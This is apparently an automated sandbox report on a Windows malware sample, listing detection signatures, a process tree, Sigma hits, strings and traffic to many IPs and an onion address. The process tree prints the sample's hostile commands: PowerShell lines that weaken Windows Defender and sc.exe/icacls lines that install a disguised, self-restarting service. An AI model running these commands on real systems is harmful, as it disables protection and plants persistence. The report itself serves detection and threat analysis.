Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1531723
MD5:31d649663149dabd99c51b71e60a4a91
SHA1:f5f515e1818388c9360bde15a7dfcb265e86a812
SHA256:2acb9052db5b304a822f8cd1169e31327e967e06ff78064997ea8a5003e783ec
Tags:exeuser-Bitsight
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (creates a PE file in dynamic memory)
Multi AV Scanner detection for dropped file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Connects to many ports of the same IP (likely port scanning)
Contains functionality to hide user accounts
Found Tor onion address
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Modifies Windows Defender protection settings
NDIS Filter Driver detected (likely used to intercept and sniff network traffic)
Sigma detected: Execution from Suspicious Folder
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious New Service Creation
Sigma detected: Suspicious Program Location with Network Connections
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Connects to several IPs in different countries
Contains functionality to call native functions
Contains functionality to create new users
Contains functionality to dynamically determine API calls
Contains functionality to enumerate network shares
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query network adapater information
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes

Classification

  • System is w10x64
  • file.exe (PID: 7096 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 31D649663149DABD99C51B71E60A4A91)
  • file.exe (PID: 5232 cmdline: C:\Users\user\Desktop\file.exe MD5: 31D649663149DABD99C51B71E60A4A91)
    • cmd.exe (PID: 6452 cmdline: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\7mmwpep245voy3fngkym99px3pj5vx36.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5592 cmdline: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 2656 cmdline: powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 7124 cmdline: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cwjk513wjc7a1mlgh3.exe (PID: 560 cmdline: "C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exe" MD5: 319865D78CC8DF6270E27521B8182BFF)
    • 73tsjpnle0jv48sgryqfs6ph8t.exe (PID: 6248 cmdline: "C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe" MD5: 7D1755E8E41A6C2F08D2FAEFFDF9DAD1)
      • taskkill.exe (PID: 5600 cmdline: taskkill.exe /F /FI "SERVICES eq RDP-Controller" MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • conhost.exe (PID: 5472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 3900 cmdline: sc.exe stop RDP-Controller MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 4192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 600 cmdline: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 3928 cmdline: sc.exe failure RDP-Controller reset= 1 actions= restart/10000 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 1868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 6756 cmdline: sc.exe start RDP-Controller MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 5408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • icacls.exe (PID: 6876 cmdline: icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18 MD5: 48C87E3B3003A2413D6399EA77707F5D)
        • conhost.exe (PID: 1712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • icacls.exe (PID: 5800 cmdline: icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\95cRhCj4pPDP.acl MD5: 48C87E3B3003A2413D6399EA77707F5D)
        • conhost.exe (PID: 5216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • main.exe (PID: 2656 cmdline: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe MD5: 4E320E2F46342D6D4657D2ADBF1F22D0)
    • WerFault.exe (PID: 4556 cmdline: C:\Windows\system32\WerFault.exe -u -p 2656 -s 1188 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 3672 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 5268 cmdline: C:\Windows\system32\WerFault.exe -pss -s 444 -p 2656 -ip 2656 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • main.exe (PID: 2256 cmdline: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe MD5: 4E320E2F46342D6D4657D2ADBF1F22D0)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, CommandLine: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, NewProcessName: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, OriginalFileName: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5268, ProcessCommandLine: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, ProcessId: 2656, ProcessName: main.exe
Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 23.128.248.23, DestinationIsIpv6: false, DestinationPort: 7777, EventID: 3, Image: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, Initiated: true, ProcessId: 2256, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 9195
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\7mmwpep245voy3fngkym99px3pj5vx36.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6452, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", ProcessId: 5592, ProcessName: powershell.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe, ParentProcessId: 6248, ParentProcessName: 73tsjpnle0jv48sgryqfs6ph8t.exe, ProcessCommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, ProcessId: 600, ProcessName: sc.exe
Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 23.137.250.108, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, Initiated: true, ProcessId: 2656, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49755
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'", CommandLine: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\7mmwpep245voy3fngkym99px3pj5vx36.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6452, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'", ProcessId: 7124, ProcessName: powershell.exe
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe, ParentProcessId: 6248, ParentProcessName: 73tsjpnle0jv48sgryqfs6ph8t.exe, ProcessCommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, ProcessId: 600, ProcessName: sc.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\7mmwpep245voy3fngkym99px3pj5vx36.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6452, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", ProcessId: 5592, ProcessName: powershell.exe
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 3672, ProcessName: svchost.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exeReversingLabs: Detection: 41%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exeJoe Sandbox ML: detected

Compliance

barindex
Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.2770000.1.unpack
Source: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exeFile created: C:\Users\user\AppData\Local\Temp\installer.logJump to behavior
Source: Binary string: RfxVmt.pdb source: 73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmp, Cw0MZxef.23.dr, rfxvmt.dll.23.dr
Source: Binary string: RfxVmt.pdbGCTL source: 73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmp, Cw0MZxef.23.dr, rfxvmt.dll.23.dr
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE11506DA3 LocalAlloc,wcsncpy,LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LookupAccountNameW,LocalFree,GetLastError,ConvertSidToStringSidA,GetLastError,wcslen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,23_2_00007FFE11506DA3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE11506D5F NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,23_2_00007FFE11506D5F
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FFE11776D5F NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,32_2_00007FFE11776D5F
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FFE11776DA3 LocalAlloc,wcsncpy,LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LookupAccountNameW,LocalFree,GetLastError,ConvertSidToStringSidA,GetLastError,wcslen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,32_2_00007FFE11776DA3
Source: C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exeCode function: 5_2_00007FF64B933DB3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,5_2_00007FF64B933DB3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FF7C1AB47A3 FindNextFileA,_mbscpy,FindFirstFileA,GetLastError,GetLastError,FindClose,23_2_00007FF7C1AB47A3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE1150A083 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,23_2_00007FFE1150A083
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE11BD1883 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,23_2_00007FFE11BD1883
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE11EC5BF3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,23_2_00007FFE11EC5BF3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE126E57B3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,23_2_00007FFE126E57B3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE1A4F5203 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,23_2_00007FFE1A4F5203
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE1A522FE3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,23_2_00007FFE1A522FE3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FFE1177A083 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,32_2_00007FFE1177A083

Networking

barindex
Source: global trafficTCP traffic: 217.255.81.237 ports 0,1,3,5,7,10753
Source: global trafficTCP traffic: 173.68.123.78 ports 0,2,3,4,5,25043
Source: global trafficTCP traffic: 77.54.240.255 ports 14290,0,1,2,4,9
Source: 73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exeString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,ht
Source: main.exe, 00000017.00000002.2668148330.00000157C5EC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.onion.im/
Source: main.exe, 00000017.00000002.2668148330.00000157C5EC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.onion.im/O
Source: main.exe, 00000017.00000002.2669826636.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe, 00000017.00000002.2668148330.00000157C5E3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exeString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,ht
Source: main.exe, 00000020.00000003.2796330606.00000142D8DAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Onion-Location: http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3
Source: main.exe, 00000020.00000003.2796297665.00000142D8DD6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Onion-Location: http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3
Source: main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.onion.im/
Source: main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.onion.im/w
Source: main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe, 00000020.00000003.2796330606.00000142D8DA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Onion-Location: http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3
Source: 6rRRlGVV.23.drString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: cwjk513wjc7a1mlgh3.exe.1.drStatic PE information: Found NDIS imports: FwpmEngineClose0, FwpmEngineOpen0, FwpmFilterAdd0, FwpmFilterDeleteByKey0, FwpmFreeMemory0, FwpmProviderAdd0, FwpmProviderCreateEnumHandle0, FwpmProviderDestroyEnumHandle0, FwpmProviderEnum0
Source: unknownNetwork traffic detected: IP country count 14
Source: global trafficTCP traffic: 192.168.2.4:49730 -> 146.70.24.213:1125
Source: global trafficTCP traffic: 192.168.2.4:49780 -> 91.149.236.241:26270
Source: global trafficTCP traffic: 192.168.2.4:49781 -> 124.169.148.215:37472
Source: global trafficTCP traffic: 192.168.2.4:49782 -> 77.54.240.255:14290
Source: global trafficTCP traffic: 192.168.2.4:49792 -> 23.137.249.66:9520
Source: global trafficTCP traffic: 192.168.2.4:49793 -> 217.255.81.237:10753
Source: global trafficTCP traffic: 192.168.2.4:49794 -> 173.68.123.78:25043
Source: global trafficTCP traffic: 192.168.2.4:49795 -> 80.46.94.241:9823
Source: global trafficTCP traffic: 192.168.2.4:49801 -> 99.174.64.226:9448
Source: global trafficTCP traffic: 192.168.2.4:50034 -> 50.100.197.208:11811
Source: global trafficTCP traffic: 192.168.2.4:50039 -> 173.47.97.119:21732
Source: global trafficUDP traffic: 192.168.2.4:28204 -> 151.242.80.51:29738
Source: global trafficUDP traffic: 192.168.2.4:28204 -> 2.191.228.230:27119
Source: global trafficUDP traffic: 192.168.2.4:28204 -> 85.236.190.252:13148
Source: global trafficUDP traffic: 192.168.2.4:28204 -> 87.225.96.167:11115
Source: global trafficUDP traffic: 192.168.2.4:28204 -> 2.178.241.192:9696
Source: global trafficUDP traffic: 192.168.2.4:28204 -> 95.68.156.35:20185
Source: global trafficUDP traffic: 192.168.2.4:28204 -> 83.255.145.146:20666
Source: global trafficUDP traffic: 192.168.2.4:28204 -> 82.38.134.93:12701
Source: global trafficUDP traffic: 192.168.2.4:28204 -> 62.210.85.80:17893
Source: global trafficUDP traffic: 192.168.2.4:9195 -> 45.30.192.252:9368
Source: global trafficUDP traffic: 192.168.2.4:9195 -> 45.126.126.80:13092
Source: global trafficUDP traffic: 192.168.2.4:9195 -> 23.128.248.23:7777
Source: global trafficUDP traffic: 192.168.2.4:9195 -> 89.87.222.219:21603
Source: Joe Sandbox ViewASN Name: ASN-METANETRoutingpeeringissuesnocmetanetchCH ASN-METANETRoutingpeeringissuesnocmetanetchCH
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
